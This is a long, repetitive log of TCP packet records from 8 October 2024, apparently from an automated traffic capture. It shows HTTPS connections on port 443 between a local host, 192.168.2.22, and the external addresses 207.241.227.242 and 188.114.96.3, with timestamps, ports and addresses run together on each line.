                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.837654114 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.837677956 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.837740898 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.837740898 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.837752104 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.839306116 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.872066021 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.872116089 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.872147083 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.872165918 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.872172117 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.872358084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.872385025 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.872414112 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.872435093 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.872777939 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.873990059 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.900139093 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.900175095 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.900270939 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.900270939 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.900284052 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.900990009 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.901016951 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.901038885 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.901056051 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.901112080 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.901112080 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.902621031 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.906160116 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.906184912 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.906248093 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.906248093 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.906260014 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.907085896 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.907409906 CEST49167443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.907485962 CEST44349167188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.908102989 CEST49167443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.910053015 CEST49167443192.168.2.22188.114.96.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.910093069 CEST44349167188.114.96.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921699047 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921736002 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921796083 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921796083 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921808004 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921891928 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921920061 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921947956 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921955109 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921969891 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921969891 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.921998978 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.924472094 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.924494028 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.924540043 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.924567938 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.924979925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959358931 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959521055 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959598064 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959598064 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959613085 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959645987 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959769964 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959769964 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.959781885 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987205982 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987252951 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987402916 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987402916 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987412930 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987860918 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987883091 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987924099 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987930059 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.987941980 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.992861986 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.992889881 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.993001938 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.993001938 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:57.993010998 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.008441925 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.008469105 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.008511066 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.008536100 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.008542061 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.010294914 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.010323048 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.010355949 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.010364056 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.010371923 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011476994 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011498928 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011564016 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011564016 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011564016 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.011575937 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.045974970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046017885 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046073914 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046073914 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046073914 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046103001 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046315908 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046344995 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046386957 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046396017 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.046410084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.074167013 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.074199915 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.074487925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.074487925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.074500084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.075045109 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.075066090 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.075229883 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.075229883 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.075239897 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.079632044 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.079663038 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.079706907 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.079725027 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.079771996 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.095454931 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.095478058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.095552921 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.095562935 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.095695972 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.097024918 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.097052097 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.097105980 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.097105980 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.097124100 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.098170042 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.098191977 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.098242044 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.098242044 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.098252058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.132935047 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.132963896 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133002043 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133018017 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133032084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133300066 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133322001 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133364916 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133364916 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.133378029 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.144689083 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161212921 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161240101 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161307096 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161318064 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161325932 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161818027 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161844015 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161885023 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161892891 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.161915064 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.165371895 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.166843891 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.166861057 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.166970015 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.166986942 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.166997910 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.167248964 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.182460070 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.182485104 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.182538986 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.182548046 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.182591915 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.182878971 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.183891058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.183913946 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.183943987 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.183962107 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.183970928 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.184202909 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.185069084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.185125113 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.185178041 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.185178041 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.185185909 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.185388088 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.220093012 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.220132113 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.220212936 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.220212936 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.220223904 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.220235109 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.220267057 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.220314980 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.220328093 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.220349073 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.224054098 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.248296022 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.248328924 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.248423100 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.248430967 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.248455048 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.248604059 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.248635054 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.248681068 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.248687983 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.248697042 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.248789072 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.254060030 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.254091978 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.254168987 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.254174948 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.254204035 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.254204035 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.269426107 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.269464970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.269526958 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.269526958 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.269536018 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.269661903 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.271255970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.271291971 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.271342039 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.271349907 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.271409988 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.271409988 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.272316933 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.272346020 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.272378922 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.272386074 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.272411108 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.272556067 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315494061 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315532923 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315594912 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315610886 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315619946 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315728903 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315794945 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315819025 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315880060 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315880060 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315887928 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.315952063 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.356595039 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.356627941 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.356739044 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.356749058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.356810093 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.356904984 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.356930017 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.356957912 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.356976032 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.356985092 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.357050896 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.357219934 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.357244015 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.357276917 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.357305050 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.357319117 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.357414007 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.363151073 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.363181114 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.363284111 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.363284111 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.363284111 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.363303900 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.364850044 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.364881992 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.364938974 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.364938974 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.364963055 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.364981890 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:58.367465973 CEST44349166207.241.227.242192.168.2.22
